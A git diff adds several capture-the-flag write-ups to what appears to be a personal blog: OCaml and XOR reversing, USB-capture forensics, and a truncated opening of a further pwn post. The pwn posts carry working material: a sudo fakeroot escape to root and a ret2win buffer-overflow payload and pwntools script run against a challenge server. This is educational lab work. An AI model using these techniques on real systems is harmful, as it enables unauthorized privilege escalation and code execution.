+Bravo ! Vous avez le flag ! 404CTF{Cg00d&slmpL3}
+```
diff --git a/writeups/2025-05-30-Dromedary.md b/writeups/2025-05-30-Dromedary.md
new file mode 100644
index 0000000..d9d0027
--- /dev/null
+++ b/writeups/2025-05-30-Dromedary.md
@@ -0,0 +1,179 @@
+---
+title: "CTF20K 2025: Dromedary"
+excerpt: "Reverse-engineering a Caml executable."
+tags: [ctf, rev] 
+---
+
+## Recon
+
+We have a binary. Its behavior is simple:
+
+```
+$ ./dromedary 
+What's a dromedary that has two bosses instead of only one? Tell me: test
+Nope, sorry!
+```
+
+We'll try to find the correct answer here. Having no source code to analyze, we have to decompile the program. I used Ghidra for this. The main function looks a bit weird:
+
+```c
+int main(int argc,char **argv)
+{
+  caml_main(argv);
+                    /* WARNING: Subroutine does not return */
+  caml_do_exit(0);
+}
+```
+
+Indeed, it is not a regular C function; the program was coded in Caml, hence the pun with the challenge name. In order to find the program instructions for the main function, we have to dive in... here is the chain of functions we have to follow in order to get there:
+
+```
+caml_main -> caml_startup_common -> caml_start_program -> caml_program -> camlDune__exe__Main__entry
+```
+
+Once we find the "real" main function, we can analyze it:
+
+```c
+void camlDune__exe__Main__entry(void)
+
+{
+  value val;
+  value val_00;
+  undefined8 uVar1;
+  long lVar2;
+  long extraout_RAX;
+  undefined8 uVar3;
+  value extraout_RAX_00;
+  undefined8 extraout_RAX_01;
+  undefined8 uVar4;
+  undefined8 extraout_RAX_02;
+  value s2;
+  undefined8 *puVar5;
+  value *fp;
+  undefined8 uVar6;
+  value vVar7;
+  long unaff_R14;
+  long unaff_R15;
+  undefined1 auVar8 [16];
+  
+  lVar2 = DAT_0032b618;
+  uVar4 = *(undefined8 *)(DAT_002cdc30 + 0x10);
+  val = *(value *)(DAT_0032b618 + 0xd0);
+  val_00 = *(value *)(DAT_0032b618 + 200);
+  uVar6 = *(undefined8 *)(DAT_0032b618 + 0xc0);
+  uVar1 = *(undefined8 *)(DAT_0032b618 + 0xb8);
+  vVar7 = val_00;
+  auVar8 = caml_allocN();
+  puVar5 = (undefined8 *)(unaff_R15 + -0x20);
+  *(undefined8 *)(unaff_R15 + -0x28) = 0x1000;
+  *puVar5 = auVar8._8_8_;
+  *(undefined8 *)(unaff_R15 + -0x18) = uVar6;
+  *(value *)(unaff_R15 + -0x10) = vVar7;
+  *(value *)(unaff_R15 + -8) = val;
+  uVar6 = *(undefined8 *)(auVar8._0_8_ + 0xb0);
+  *(undefined8 *)(unaff_R15 + -0x50) = 0x10f7;
+  *(undefined8 *)(unaff_R15 + -0x48) = camlDune__exe__Main__reset_740;
+  *(undefined8 *)(unaff_R15 + -0x40) = 0x100000000000005;
+  *(undefined8 **)(unaff_R15 + -0x38) = puVar5;
+  *(undefined8 *)(unaff_R15 + -0x30) = uVar6;
+  fp = (value *)(unaff_R15 + -0x60);
+  *(undefined8 *)(unaff_R15 + -0x68) = 0x800;
+  *fp = 1;
+  *(undefined8 *)(unaff_R15 + -0x58) = 1;
+  *(undefined8 *)(unaff_R15 + -0x88) = 0xcf7;
+  *(code **)(unaff_R15 + -0x80) = camlDune__exe__Main__aux_886;
+  *(undefined8 *)(unaff_R15 + -0x78) = 0x100000000000005;
+  *(value **)(unaff_R15 + -0x70) = fp;
+  *(undefined8 *)(unaff_R15 + -0xa0) = 0x800;
+  *(undefined8 *)(unaff_R15 + -0x98) = &camlSpectrum__const_immstring_133;
+  *(value *)(unaff_R15 + -0x90) = *fp;
+  caml_modify(fp,(value)(unaff_R15 + -0x98));
+  *(long *)(unaff_R15 + -0x58) = *(long *)(unaff_R15 + -0x58) + 2;
+  camlStdlib__Seq__empty_41();
+  if (extraout_RAX != 1) {
+    vVar7 = *fp;
+    uVar3 = caml_alloc2();
+    *(undefined8 *)(unaff_R15 + -0xa0) = 0x800;
+    *(undefined8 *)(unaff_R15 + -0x98) = uVar3;
+    *(value *)(unaff_R15 + -0x90) = vVar7;
+    caml_modify(fp,(value)(unaff_R15 + -0x98));
+    *(long *)(unaff_R15 + -0x58) = *(long *)(unaff_R15 + -0x58) + 2;
+    camlDune__exe__Main__aux_886();
+  }
+  caml_allocN();
+  *(undefined8 *)(unaff_R15 + -0xe0) = 0x1cf7;
+  *(undefined8 *)(unaff_R15 + -0xd8) = camlDune__exe__Main__mark_open_stag_761;
+  *(undefined8 *)(unaff_R15 + -0xd0) = 0x100000000000005;
+  *(undefined8 *)(unaff_R15 + -200) = uVar4;
+  *(value **)(unaff_R15 + -0xc0) = fp;
+  *(undefined8 **)(unaff_R15 + -0xb8) = puVar5;
+  *(undefined8 *)(unaff_R15 + -0xb0) = uVar6;
+  *(undefined8 *)(unaff_R15 + -0xa8) = uVar1;
+  *(undefined8 *)(unaff_R15 + -0x100) = 0xcf7;
+  *(undefined8 *)(unaff_R15 + -0xf8) = camlDune__exe__Main__mark_close_stag_790;
+  *(undefined8 *)(unaff_R15 + -0xf0) = 0x100000000000005;
+  *(value **)(unaff_R15 + -0xe8) = fp;
+  caml_modify((value *)(lVar2 + 0xb8),(value)(unaff_R15 + -0xd8));
+  caml_modify((value *)(lVar2 + 0xc0),(value)(unaff_R15 + -0xf8));
+  caml_modify((value *)(lVar2 + 200),val_00);
+  caml_modify((value *)(lVar2 + 0xd0),val);
+  *(undefined8 *)(lVar2 + 0xb0) = 3;
+  camlDune__exe__Main__reset_ppf_162 = (undefined8 *)(unaff_R15 + -0x48);
+  camlCamlinternalFormat__make_printf_4961();
+  caml_c_call(camlStdlib__Pccall_1846);
+  puVar5 = *(undefined8 **)(unaff_R14 + 8);
+  camlStdlib__input_line_1013();
+  camlDune__exe__Main__user_input_158 = extraout_RAX_00;
+  camlStdlib__Bytes__make_245();
+  camlStdlib__List__map_462();
+  uVar4 = caml_alloc2();
+  camlDune__exe__Main__apply_arg_156 = puVar5 + 1;
+  *puVar5 = 0x800;
+  *camlDune__exe__Main__apply_arg_156 = extraout_RAX_01;
+  puVar5[2] = uVar4;
+  camlStdlib__String__sum_lengths_277();
+  caml_c_call(extraout_RAX_02);
+  camlStdlib__String__unsafe_blits_311();
+  camlDune__exe__Main__processed_154 = s2;
+  camlDune__exe__Main__cond_153 = caml_string_equal(camlDune__exe__Main__user_input_158,s2);
+  if (camlDune__exe__Main__cond_153 == 1) {
+    camlCamlinternalFormat__make_printf_4961();
+  }
+  else {
+    camlCamlinternalFormat__make_printf_4961();
+  }
+  lVar2 = DAT_0032b618;
+  uVar4 = camlDune__exe__Main__reset_ppf_162[3];
+  camlStdlib__Format__pp_flush_queue_1605();
+  (*(code *)**(undefined8 **)(lVar2 + 0x88))();
+  *(undefined8 *)(DAT_0032b618 + 0xb0) = uVar4;
+  camlStdlib__Format__pp_set_formatter_stag_functions_1511();
+  return;
+}
+```
+
+That looks.. unnecessarily complex. But still, we can extract some interesting information from this code. There seems to be a call to printf through a wrapper named `camlCamlinternalFormat__make_printf_4961`, and some other calls.. but the most interesting part is the answer validation.
+A call to `caml_string_equal`, which is the equivalent for the traditional `strcmp`, is done, comparing the user input with some `s2` label.
+
+## Exploitation
+
+We can easily understand that the answer we're looking for is in that s2 label at runtime. Using the GDB debugger, we can find the address for the string comparison function, and put a breakpoint there:
+
+```
+(gdb) info address caml_string_equal
+Symbol "caml_string_equal" is a function at address 0x5555556cf4a0.
+(gdb) b *0x5555556cf4a0
+Breakpoint 2 at 0x5555556cf4a0: file str.c, line 276.
+```
+
+
+Once we reach the breakpoint, we can print the contents of s2, and we have our flag!
+
+```
+(gdb) r
+What's a dromedary that has two bosses instead of only one? Tell me: whatever 
+
+Breakpoint 2, caml_string_equal (s1=140737350800592, s2=140737350799552) at str.c:276
+(gdb) x/s s2
+0x7ffff7cd10c0: "RM{1t'5_c4113d_4_c4m31!!}"
+```
diff --git a/writeups/2025-06-02-FakeNews.md b/writeups/2025-06-02-FakeNews.md
new file mode 100644
index 0000000..e232d07
--- /dev/null
+++ b/writeups/2025-06-02-FakeNews.md
@@ -0,0 +1,46 @@
+---
+title: "CTF20K 2025: Fake News"
+excerpt: "Using misconfigured Linux system utilities to escalate privilege."
+tags: [ctf, pwn]
+---
+
+We are provided with an user SSH login. Once on the server, we can explore a bit and we quickly find something interesting:
+
+```
+user@65fbb9aee61c7005bfc08c5e2dec9231:~$ sudo -l
+Matching Defaults entries for user on 65fbb9aee61c7005bfc08c5e2dec9231:
+    env_reset, mail_badpass,
+    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
+    use_pty
+
+User user may run the following commands on
+        65fbb9aee61c7005bfc08c5e2dec9231:
+    (ALL) NOPASSWD: /usr/bin/fakeroot -f *
+```
+
+The `sudo` command here allows us to see what commands we can run with superuser privileges. We see that the `usr/bin/fakeroot -f` command can be ran this way, with anything as the argument.
+
+Fakeroot is a tool that makes the environment look like it has root privileges for file manipulation: this is particularly useful to create archives with files in them having root ownership, without actually having it. By looking at the manual page for this command, we see this:
+
+```
+--faked binary
+    Specify an alternative binary to use as faked. 
+```
+
+*Here, `-f` is shorthand for this `--faked` option.*
+The **faked** that the manual refers to can be set to anything, therefore we could try setting it as something useful like `bash`:
+
+```
+user@65fbb9aee61c7005bfc08c5e2dec9231:~$ sudo /usr/bin/fakeroot -f bash
+root@65fbb9aee61c7005bfc08c5e2dec9231:/home/user# id
+root@65fbb9aee61c7005bfc08c5e2dec9231:/home/user# ls
+```
+
+Here we see that there is no output at all, for any of our commands.. but if we try to escape that shell with a simple `^D`, we can access the real root shell:
+
+```
+root@65fbb9aee61c7005bfc08c5e2dec9231:/home/user# 
+exit
+root@65fbb9aee61c7005bfc08c5e2dec9231:/home/user# cat /root/flag.txt 
+RM{Omg_Fakeroot_is_Fak3???}
+```
diff --git a/writeups/2025-06-05-GorfouEnDanger1.md b/writeups/2025-06-05-GorfouEnDanger1.md
new file mode 100644
index 0000000..3a137a4
--- /dev/null
+++ b/writeups/2025-06-05-GorfouEnDanger1.md
@@ -0,0 +1,206 @@
+---
+title: "404CTF 2025: Gorfou en danger 1"
+excerpt: "The space agency is in danger and we need to know what's up with this binary."
+tags: [ctf, pwn] 
+---
+
+## Recon
+
+We're doing the usual first steps here. It's good to know that the binary is 64-bit and little endian:
+
+```
+$ file chall 
+chall: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=bc5d9d86ef7f729d68624930e7ed982127aa5c5f, for GNU/Linux 3.2.0, not stripped
+
+$ checksec --file=chall
+[*] 'GorfouEnDanger/gorfou-en-danger-1/chall'
+    Arch:       amd64-64-little
+    RELRO:      Partial RELRO
+    Stack:      No canary found
+    NX:         NX enabled
+    PIE:        No PIE (0x400000)
+    Stripped:   No
+```
+
+Fortunately here, we have access to the source code. There it is, stripped from all the unnecessary stuff:
+
+```c
+void debug_access(void) {
+    puts("Accès à l'interface de debogage..."); 
+    system("/bin/sh");
+    return;
+}
+
+void take_command() {
+    char command[0x100];
+    
+    printf("> ");
+    read(0, command, 0x130);
+    printf("Commande inconnue\n");
+}
+
+int main(void) {
+    while (1) {
+        take_command();
+    }
+    return 0;
+}
+```
+
+At first glance, we see that the `take_command` function, called by `main`, contains a call to `read` in a buffer of size `0x130` (304 decimal), but the said buffer is only `0x100` bytes long (256 decimal). This is clearly a buffer overflow and we can exploit it.
+
+Also, we note the presence of the `debug_access` function, called nowhere. This function calls a shell, therefore we will try to call it using the buffer overflow.
+
+So, our exploit will consist in a ret2win attack:
+- some padding, to overwrite the return address on the stack;
+- the address of the `debug_access` function.
+
+## Exploitation
+
+To find the offset of the return address, we can create a cyclic pattern of size 300, using an [online tool](https://wiremask.eu/tools/buffer-overflow-pattern-generator/?), because for some reason my `cyclic` tool didn't work right this time:
+
+```
+Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
+```
+
+Using `pwndbg` we can inspect the contents of registers, after the segmentation fault occured (due to the program trying to access an invalid address, because it was overwritten by our cyclic pattern):
+
+```
+RSP  0x7fffffffd888 ◂— 'Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9\n'
+```
+
+Looking up this pattern in our cyclic tool, we end up with the offset 264.
+Next, let's get the address of our forbidden function:
+
+```
+pwndbg> info fun debug_access
+0x00000000004004fd  debug_access
+```
+
+Remembering the target works in little-endian, we have to inject address bytes in reverse order. We can now craft our payload manually using Python:
+
+```
+$ python2 -c 'print "A"*264 + "\xfd\x04\x40\x00\x00\x00\x00\x00"' > payload
+```
+
+With our payload ready, we can finally exploit the binary:
+
+```
+cat payload | ./chall
+```
+
+A less manual approach would be to make a Python script using the Pwntools library (stripped from boilerplate code here for simplicity):
+
+```
+from pwn import *
+io = start()
+padding = 264
+
+payload = flat(
+    b'A' * padding,
+    elf.functions.debug_access
+)
+
+io.sendlineafter(b'>', payload)
+
+io.interactive()
+```
+
+We can run the exploit on the remote server to get our flag:
+
+```
+$ python exploit.py REMOTE challenges.404ctf.fr 32462
+[O] Opening connection to challenges.404ctf.fr on port 32462: Trying 51.91.[+] Opening connection to challenges.404ctf.fr on port 32462: Done
+[DEBUG] Received 0x3f1 bytes:
+    00000000  20 20 20 20  20 20 5f 5f  20 20 20 20  20 20 20 20  │    │  __│    │    │
+    00000010  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  │    │    │    │    │
+    *
+    00000040  20 20 20 20  20 20 20 20  20 20 20 20  20 0a 20 20  │    │    │    │ ·  │
+    00000050  20 20 20 2f  5c 20 5c 20  20 20 20 20  20 20 20 20  │   /│\ \ │    │    │
+    00000060  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  │    │    │    │    │
+    *
+    00000090  20 20 20 20  20 20 20 20  20 0a 20 20  20 20 2f 20  │    │    │ ·  │  / │
+    000000a0  20 5c 20 5c  20 20 20 20  20 20 2e 2d  2d 2d 2d 2d  │ \ \│    │  .-│----│
+    000000b0  2d 2d 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d  │----│----│----│----│
+    *
+    000000e0  2d 2d 2d 2e  20 0a 20 20  20 2f 20 2f  5c 20 5c 20  │---.│ ·  │ / /│\ \ │
+    000000f0  5c 20 20 20  20 20 7c e2  96 91 e2 96  88 e2 96 80  │\   │  |·│····│····│
+    00000100  e2 96 84 e2  96 91 e2 96  88 e2 96 80  e2 96 80 e2  │····│····│····│····│
+    00000110  96 91 e2 96  88 e2 96 80  e2 96 80 e2  96 91 e2 96  │····│····│····│····│
+    00000120  88 e2 96 80  e2 96 80 e2  96 91 e2 96  91 e2 96 91  │····│····│····│····│
+    00000130  e2 96 88 e2  96 80 e2 96  80 e2 96 91  e2 96 88 e2  │····│····│····│····│
+    00000140  96 80 e2 96  88 e2 96 91  e2 96 88 e2  96 80 e2 96  │····│····│····│····│
+    00000150  88 e2 96 91  e2 96 88 e2  96 80 e2 96  80 e2 96 91  │····│····│····│····│
+    00000160  e2 96 88 e2  96 80 e2 96  88 e2 96 91  e2 96 88 e2  │····│····│····│····│
+    00000170  96 91 e2 96  91 e2 96 91  e2 96 88 e2  96 80 e2 96  │····│····│····│····│
+    00000180  80 e2 96 91  e2 96 91 e2  96 91 e2 96  88 e2 96 91  │····│····│····│····│
+    00000190  e2 96 88 e2  96 91 e2 96  80 e2 96 88  e2 96 91 7c  │····│····│····│···|│
+    000001a0  0a 20 20 2f  20 2f 20 2f  5c 20 5c 20  5c 20 20 20  │·  /│ / /│\ \ │\   │
+    000001b0  20 7c e2 96  91 e2 96 88  e2 96 91 e2  96 88 e2 96  │ |··│····│····│····│
+    000001c0  91 e2 96 88  e2 96 91 e2  96 88 e2 96  91 e2 96 80  │····│····│····│····│
+    000001d0  e2 96 80 e2  96 88 e2 96  91 e2 96 88  e2 96 91 e2  │····│····│····│····│
+    000001e0  96 88 e2 96  91 e2 96 91  e2 96 91 e2  96 88 e2 96  │····│····│····│····│
+    000001f0  91 e2 96 91  e2 96 91 e2  96 88 e2 96  91 e2 96 88  │····│····│····│····│
+    00000200  e2 96 91 e2  96 88 e2 96  91 e2 96 88  e2 96 91 e2  │····│····│····│····│
+    00000210  96 80 e2 96  80 e2 96 88  e2 96 91 e2  96 88 e2 96  │····│····│····│····│
+    00000220  91 e2 96 88  e2 96 91 e2  96 88 e2 96  91 e2 96 91  │····│····│····│····│
+    00000230  e2 96 91 e2  96 88 e2 96  80 e2 96 80  e2 96 91 e2  │····│····│····│····│
+    00000240  96 91 e2 96  91 e2 96 80  e2 96 84 e2  96 80 e2 96  │····│····│····│····│
+    00000250  91 e2 96 91  e2 96 88 e2  96 91 7c 0a  20 2f 20 2f  │····│····│··|·│ / /│
+    00000260  20 2f 5f 5f  5c 5f 5c 20  5c 20 20 20  7c e2 96 91  │ /__│\_\ │\   │|···│
+    00000270  e2 96 80 e2  96 80 e2 96  91 e2 96 91  e2 96 80 e2  │····│····│····│····│
+    00000280  96 80 e2 96  80 e2 96 91  e2 96 80 e2  96 80 e2 96  │····│····│····│····│
+    00000290  80 e2 96 91  e2 96 80 e2  96 80 e2 96  80 e2 96 91  │····│····│····│····│
+    000002a0  e2 96 91 e2  96 91 e2 96  80 e2 96 80  e2 96 80 e2  │····│····│····│····│
+    000002b0  96 91 e2 96  80 e2 96 80  e2 96 80 e2  96 91 e2 96  │····│····│····│····│
+    000002c0  80 e2 96 91  e2 96 80 e2  96 91 e2 96  80 e2 96 80  │····│····│····│····│
+    000002d0  e2 96 80 e2  96 91 e2 96  80 e2 96 80  e2 96 80 e2  │····│····│····│····│
+    000002e0  96 91 e2 96  80 e2 96 80  e2 96 80 e2  96 91 e2 96  │····│····│····│····│
+    000002f0  80 e2 96 80  e2 96 80 e2  96 91 e2 96  91 e2 96 91  │····│····│····│····│
+    00000300  e2 96 91 e2  96 80 e2 96  91 e2 96 91  e2 96 80 e2  │····│····│····│····│
+    00000310  96 80 e2 96  80 7c 0a 2f  20 2f 20 2f  5f 5f 5f 5f  │····│·|·/│ / /│____│
+    00000320  5f 5f 5f 5f  5c 20 20 27  2d 2d 2d 2d  2d 2d 2d 2d  │____│\  '│----│----│
+    00000330  2d 2d 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d  │----│----│----│----│
+    *
+    00000360  27 20 20 0a  5c 2f 5f 5f  5f 5f 5f 5f  5f 5f 5f 5f  │'  ·│\/__│____│____│
+    00000370  5f 2f 20 20  20 20 20 20  20 20 20 20  20 20 20 20  │_/  │    │    │    │
+    00000380  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  │    │    │    │    │
+    *
+    000003b0  0a 54 65 72  6d 69 6e 61  6c 20 64 65  20 63 6f 6e  │·Ter│mina│l de│ con│
+    000003c0  74 72 c3 b4  6c 65 20 c3  a0 20 64 69  73 74 61 6e  │tr··│le ·│· di│stan│
+    000003d0  63 65 20 64  65 20 6c 61  20 62 61 73  65 20 6d 61  │ce d│e la│ bas│e ma│
+    000003e0  72 74 69 65  6e 6e 65 20  46 65 72 6d  61 74 0a 3e  │rtie│nne │Ferm│at·>│
+    000003f0  20                                                  │ │
+    000003f1
+[DEBUG] Sent 0x111 bytes:
+    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
+    *
+    00000100  41 41 41 41  41 41 41 41  fd 04 40 00  00 00 00 00  │AAAA│AAAA│··@·│····│
+    00000110  0a                                                  │·│
+    00000111
+[*] Switching to interactive mode
+ [DEBUG] Received 0x37 bytes:
+    00000000  43 6f 6d 6d  61 6e 64 65  20 69 6e 63  6f 6e 6e 75  │Comm│ande│ inc│onnu│
+    00000010  65 0a 41 63  63 c3 a8 73  20 c3 a0 20  6c 27 69 6e  │e·Ac│c··s│ ·· │l'in│
+    00000020  74 65 72 66  61 63 65 20  64 65 20 64  65 62 6f 67  │terf│ace │de d│ebog│
+    00000030  61 67 65 2e  2e 2e 0a                               │age.│..·│
+    00000037
+Commande inconnue
+Accès à l'interface de debogage...
+$ ls
+[DEBUG] Sent 0x3 bytes:
+    b'ls\n'
+[DEBUG] Received 0x1f bytes:
+    b'chall\n'
+    b'flag.txt\n'
+    b'lancement-fusee\n'
+chall
+flag.txt
+lancement-fusee
+$ cat flag.txt
+[DEBUG] Sent 0xd bytes:
+    b'cat flag.txt\n'
+[DEBUG] Received 0x1c bytes:
+    b'404CTF{c@n_7He_GoRF0u_F1y_?}'
+404CTF{c@n_7He_GoRF0u_F1y_?}
+```
diff --git a/writeups/2025-06-10-MPC.md b/writeups/2025-06-10-MPC.md
new file mode 100644
index 0000000..4a42d00
--- /dev/null
+++ b/writeups/2025-06-10-MPC.md
@@ -0,0 +1,157 @@
+---
+title: "CTF20K 2025: MPC"
+excerpt: "Reverse-engineering a Multi-Password Checker to extract sensitive information."
+tags: [ctf, rev]
+---
+
+
+## Recon
+
+The challenge starts with a binary file, that has the following behavior:
+
+```
+$ ./password_checker 
+Enter a password: test
+Password is invalid.
+```
+
+We will have to guess the password here. There is no source code available for that program, therefore we have to disassemble it using a tool like Ghidra. The decompiled main function looks like this:
+
+```c
+undefined8 main(void)
+
+{
+  int iVar1;
+  long in_FS_OFFSET;
+  undefined1 local_78 [104];
+  long local_10;
+  
+  local_10 = *(long *)(in_FS_OFFSET + 0x28);
+  printf("Enter a password: ");
+  __isoc99_scanf(&DAT_004b603b,local_78);
+  iVar1 = is_valid_password(local_78);
+  if (iVar1 == 0) {
+    puts("Password is invalid.");
+  }
+  else {
+    puts("Password is valid.");
+  }
+  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
+                    /* WARNING: Subroutine does not return */
+    __stack_chk_fail();
+  }
+  return 0;
+}
+```
+
+The program asks for user input, passes it through the `is_valid_password` function and outputs text accordingly. Let's analyze this function:
+
+```c
+undefined8 is_valid_password(char *param_1)
+
+{
+  char cVar1;
+  size_t sVar2;
+  undefined8 uVar3;
+  int local_10;
+  
+  sVar2 = strlen(param_1);
+  if ((int)sVar2 == 0x17) {
+    for (local_10 = 0; local_10 < 0x17; local_10 = local_10 + 1) {
+      cVar1 = transform_char((int)param_1[local_10],local_10);
+      if (cVar1 != valid_password_encrypted[local_10]) {
+        return 0;
+      }
+    }
+    cVar1 = transform_char((int)param_1[2],2);
+    if (cVar1 == '\x1f') {
+      cVar1 = transform_char((int)param_1[5],5);
+      if (cVar1 == '\x1f') {
+        cVar1 = transform_char((int)param_1[8],8);
+        if (cVar1 == '\v') {
+          uVar3 = 1;
+        }
+        else {
+          uVar3 = 0;
+        }
+      }
+      else {
+        uVar3 = 0;
+      }
+    }
+    else {
+      uVar3 = 0;
+    }
+  }
+  else {
+    uVar3 = 0;
+  }
+  return uVar3;
+}
+```
+
+The function loops through all characters in the given string (user input), and passes each of them into the `transform_char` function. It then checks each char against the `valid_password_encrypted` string at the same index. That means, if we get the encrypted version of the password, and we pass it through an inverse version of `transform_char`, we could get the right password..
+
+Decompiling `transform_char` gives us this:
+
+```c
+uint transform_char(byte param_1,int param_2)
+
+{
+  return param_2 + (param_1 ^ 0x33) ^ 0x55;
+}
+```
+
+## Exploitation
+
+The function is pretty straightforward, as it consists of simple bitwise XOR operations, and one addition. Keeping in mind that both addition and bitwise-XOR have the same priority in computation, and considering the classical left-to-right calculation order, and knowing that XORing two times against the same number gives back the original value, inversing it gives:
+
+```c
+param_1 ^ 0x55 - param_2 ^ 0x33
+```
+
+Now we have to find the encrypted password. Using the `nm` tool, we can find the memory address of a label in a program:
+
+```
+$ nm -C ./password_checker | grep valid_password_encrypted
+00000000004b6010 R valid_password_encrypted
+```
+
+Having that specific address in mind, we can boot up our favorite debugger and explore that area:
+
+```
+(gdb) x/32bx 0x00000000004b6010
+0x4b6010 <valid_password_encrypted>:    0x34    0x2a    0x1f    0x31    0x0f       0x1f    0x27    0x30
+0x4b6018 <valid_password_encrypted+8>:  0x0b    0x20    0x33    0x19    0x2d       0x34    0x31    0x03
+0x4b6020 <valid_password_encrypted+16>: 0x29    0x27    0x3d    0x0d    0x39       0x09    0x31    0x00
+0x4b6028:       0x45    0x6e    0x74    0x65    0x72    0x20    0x61    0x20
+```
+
+The password is a null-terminated string, and by looking at this output we know that it is 23 bytes long. Our final ciphertext is this:
+
+```
+34 2a 1f 31 0f 1f 27 30 0b 20 33 19 2d 34 31 03 29 27 3d 0d 39 09 31
+```
+
+Now, let's apply the inverse XOR-based transformation to every byte, concatenate the output, and print it as a string, using a simple Python script:
+
+```python
+encrypted = [
+    0x34, 0x2a, 0x1f, 0x31, 0x0f, 0x1f, 0x27, 0x30,
+    0x0b, 0x20, 0x33, 0x19, 0x2d, 0x34, 0x31, 0x03,
+    0x29, 0x27, 0x3d, 0x0d, 0x39, 0x09, 0x31
+]
+
+def inverse_transform_char(t, i):
+    return chr(((t ^ 0x55) - i) ^ 0x33)
+
+password = ''.join(inverse_transform_char(t, i) for i, t in enumerate(encrypted))
+print(password)
+```
+
+There we go!
+
+```
+$ python exploit.py 
+RM{Rev_me_or_get_Revkt}
+```
diff --git a/writeups/2025-06-12-USB51.md b/writeups/2025-06-12-USB51.md
new file mode 100644
index 0000000..6eb1dab
--- /dev/null
+++ b/writeups/2025-06-12-USB51.md
@@ -0,0 +1,73 @@
+---
+title: "404CTF 2025: USB51"
+excerpt: "Identifying information present in a data leak using a USB packet capture."
+tags: [ctf, forensics] 
+---
+
+Someone tried to exfiltrate data from our space agency, and we need to know what it was. To do this, we're given a USB packet capture in `pcapng` format. Opening it using Wireshark was my first reflex:
+
+```
+1	0.000000	host	2.3.2	USBMS	95	SCSI: Test Unit Ready LUN: 0x00
+2	0.000037	2.3.2	host	USB	64	URB_BULK out
+3	0.000054	host	2.3.1	USB	64	URB_BULK in
+4	0.000150	2.3.1	host	USBMS	77	
+5	1.173244	host	1.1.0	USBHUB	64	SET_FEATURE Request    [Port 3: PORT_SUSPEND]
+```
+
+As we can see, there is some communication going on between the host and a couple of USB devices. When ordering the packets by Length, we find something interesting:
+
+```
+43	3.364572	host	2.3.2	USB	48192	URB_BULK out
+73	3.381362	host	2.3.2	USB	576	URB_BULK out
+67	3.380135	host	2.3.2	USB	576	URB_BULK out
+61	3.378983	host	2.3.2	USB	576	URB_BULK out
+```
+
+One packet is clearly standing out from the others; its size is 48192 bytes, whereas the others are usually 576 bytes or less. Let's investigate this one: we can copy its raw information as a hex stream:
+
+```
+255044462d312e370a25c3a4c3bcc3b6c39f0a322030206f626a0a3c3c2f4c656e6774682033203020522f46696c7465722f466c6174654465636f64653e3e0a73747265616d0a789c9d5a4d8fe3b811bdf7af30905b0e1ab2f80d180624cb0eb2c81e266920872087ddd9d960379b1964308b24ff3eaf8a12f561aa65ed34bac7966592557cf5
+[redacted for simplicity]
+```
+
+This hex can then be transcribed to ASCII-printable characters with a tool like CyberChef:
+
+```
+@µC*ä.ÿÿS.....-.é©.h....§*	..ÿÿÿ.¼...¼..........................%PDF-1.7
+%äüöÃ.
+2 0 obj
+<</Length 3 0 R/Filter/FlateDecode>>
+[redacted for simplicity]
+```
+
+Looks like we found a PDF file! Let's look at the hex dump of a sample PDF to see how it's made on the inside:
+
+```
+00000000   25 50 44 46  2D 31 2E 37  0A 25 C3 A4  %PDF-1.7.%..
+0000000C   C3 BC C3 B6  C3 9F 0A 32  20 30 20 6F  .......2 0 o
+00000018   62 6A 0A 3C  3C 2F 4C 65  6E 67 74 68  bj.<</Length
+00000024   20 33 20 30  20 52 2F 46  69 6C 74 65   3 0 R/Filte
+00000030   72 2F 46 6C  61 74 65 44  65 63 6F 64  r/FlateDecod
+0000003C   65 3E 3E 0A  73 74 72 65  61 6D 0A 78  e>>.stream.x
+[redacted for simplicity]
+00001D08   0A 3E 3E 0A  73 74 61 72  74 78 72 65  .>>.startxre
+00001D14   66 0A 36 38  39 34 0A 25  25 45 4F 46  f.6894.%%EOF
+00001D20   0A                                     .
+```
+
+We can see that a normal PDF file starts with `%PDF-1.7` and ends with `%%EOF`, followed by a newline character (in the dump, byte `0A`). We can now trim our hex dump to these borders, and then dump the whole hex into a fresh PDF, to examine it like a human would do:
+
+```
+$ xxd -r -p pdf_hex.txt > extracted.pdf
+$ open extracted.pdf
+```
+
+When opening that PDF file, we see a report of the space agency, containing a binary piece of information, that we can convert to ASCII easily:
+
+```
+00110100 00110000 00110100 01000011 01010100 01000110 01111011 01010111
+00110011 01011111 01100011 00110000 01001101 01000101 01011111 01001001
+01001110 01011111 01110000 00110011 01100001 01000011 00110011 01111101
+```
+
+We have the flag! `404CTF{W3_c0ME_IN_p3aC3}`
diff --git a/writeups/2025-07-20-Corporate-cliche.md b/writeups/2025-07-20-Corporate-cliche.md
new file mode 100644
index 0000000..ab77066
--- /dev/null
+++ b/writeups/2025-07-20-Corporate-cliche.md
@@ -0,0 +1,216 @@
+---
+title: "DownUnderCTF 2025: corporate-cliche"
+excerpt: "Here, we'll exploit a buffer overflow in a mock e-mail server."
+tags: [ctf, pwn] 
+---
+
+## Recon
+
+An executable file is given. Let's do some recon first:
+
+```
+$ file email_server
